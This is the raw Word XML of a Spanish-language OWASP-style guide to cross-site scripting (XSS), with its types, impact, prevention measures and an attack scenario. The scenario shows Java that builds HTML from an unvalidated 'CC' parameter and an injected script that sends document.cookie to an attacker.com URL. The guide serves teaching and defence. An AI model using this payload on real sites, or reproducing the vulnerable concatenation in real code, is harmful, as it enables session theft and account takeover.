        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="0072227B" w:rsidRDefault="0072227B" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="534726F6" wp14:editId="6BAE8F18">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65347</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>412</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1276528" cy="809738"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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44B457.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId86">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276528" cy="809738"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Secuencia de comandos en sitios cruzados (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0072227B" w:rsidRDefault="00912EEA" w:rsidP="0072227B">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072227B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los XSS ocurren cuando una aplicación toma datos no confiables y los envía al navegador web sin una validación y codificación apropiada; o actualiza una página web existente con datos suministrados por el usuario utilizando una API que ejecuta JavaScript en el navegador. Permiten ejecutar comandos en el navegador de la víctima y el atacante puede secuestrar una sesión, modificar (defacement) los sitios web, o redireccionar al usuario hacia un sitio malicioso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22B482DB" wp14:editId="020CDE35">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-69660</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-5830</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8241475" cy="847085"/>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442AF5.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId87">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8241475" cy="847085"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00205A91" w:rsidRDefault="00912EEA" w:rsidP="00205A91">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205A91">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Existen herramientas automatizadas que permiten detectar y explotar las </w:t>
            </w:r>
            <w:r w:rsidRPr="00205A91">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>tres formas de XSS, y también se encuentran disponibles kits de explotación gratuitos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00205A91">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Las herramientas automatizadas pueden detectar algunos problemas XSS en forma </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>automática, particularmente en tecnologías maduras como PHP, J2EE / JSP, y ASP.NET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00205A91">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El impacto de XSS es moderado para el caso de XSS Reflejado y XSS en </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>DOM, y severa para XSS Almacenado, que permite ejecutar secuencias de comandos en el navegador de la víctima, para robar credenciales, secuestrar sesiones, o la instalación de software malicioso en el equipo de la víctima.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00E979E1" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Existen tres formas usuales de XSS para atacar a los navegadores de los usuarios</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00E979E1" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS Reflejado: la aplicación o API utiliza datos sin validar, suministrados por un usuario y codificados como parte del HTML o </w:t>
            </w:r>
            <w:r w:rsidR="00E979E1" w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> de salida. No existe una cabecera que establezca la Política de Seguridad de Contenido (CSP). Un ataque exitoso permite al atacante ejecutar comandos arbitrarios (HTML y </w:t>
            </w:r>
            <w:r w:rsidR="00E979E1" w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">) en el navegador de la víctima. Típicamente el usuario deberá interactuar con un enlace, o alguna otra página controlada por el </w:t>
            </w:r>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">atacante, como un ataque del tipo pozo de agua, publicidad maliciosa, o similar. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00E979E1" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS Almacenado: la aplicación o API almacena datos proporcionados por el usuario sin validar ni sanear, los que posteriormente son visualizados o utilizados por otro usuario o un administrador. Usualmente es considerado como de riesgo de nivel alto o crítico. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00E979E1" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XSS Basados en DOM: frameworks en JavaScript, aplicaciones de página única o APIs incluyen datos dinámicamente, controlables por un atacante. Idealmente, se debe evitar procesar datos controlables por el atacante en APIs no seguras.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="29"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E979E1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los ataques XSS incluyen el robo de la sesión, apropiación de la cuenta, evasión de autentificación de múltiples pasos, reemplazo de nodos DOM, inclusión de troyanos de autentificación, ataques contra el navegador, descarga de software malicioso, keyloggers, y otros tipos de ataques al lado cliente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prevenir XSS requiere mantener los datos no confiables separados del contenido activo del navegador.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilizar frameworks seguros que, por diseño, automáticamente codifican el contenido para prevenir XSS, como en Ruby 3.0 o React JS. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Codificar los datos de requerimientos HTTP no confiables en los campos de salida HTML (cuerpo, atributos, JavaScript, CSS, o URL) resuelve los XSS Reflejado y XSS Almacenado.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Aplicar codificación sensitiva al contexto, cuando se modifica el documento en el navegador del cliente, ayuda a prevenir DOM XSS.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00E979E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Habilitar una Política de Seguridad de Contenido (CSP) es una defensa profunda para la mitigación de vulnerabilidades XSS, asumiendo que no hay otras vulnerabilidades que permitan colocar código malicioso vía inclusión de archivos locales, bibliotecas vulnerables en fuentes conocidas almacenadas en Redes de Distribución de Contenidos (CDN) o localmente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00AD15D0">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD15D0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>la aplicación utiliza datos no confiables en la construcción del código HTML sin validarlos o codificarlos:</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(String) page += "&lt;input name='creditcard' type='TEXT' value='" + </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>request.getParameter("CC") + "'&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AD15D0" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD15D0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> El atacante modifica el </w:t>
            </w:r>
            <w:r w:rsidR="00AD15D0" w:rsidRPr="00AD15D0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>parámetro</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD15D0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> “CC” en el navegador por: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&gt;&lt;script&gt;document.location='http://www.attacker.com/cgibin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'</w:t>
            </w:r>
          </w:p>
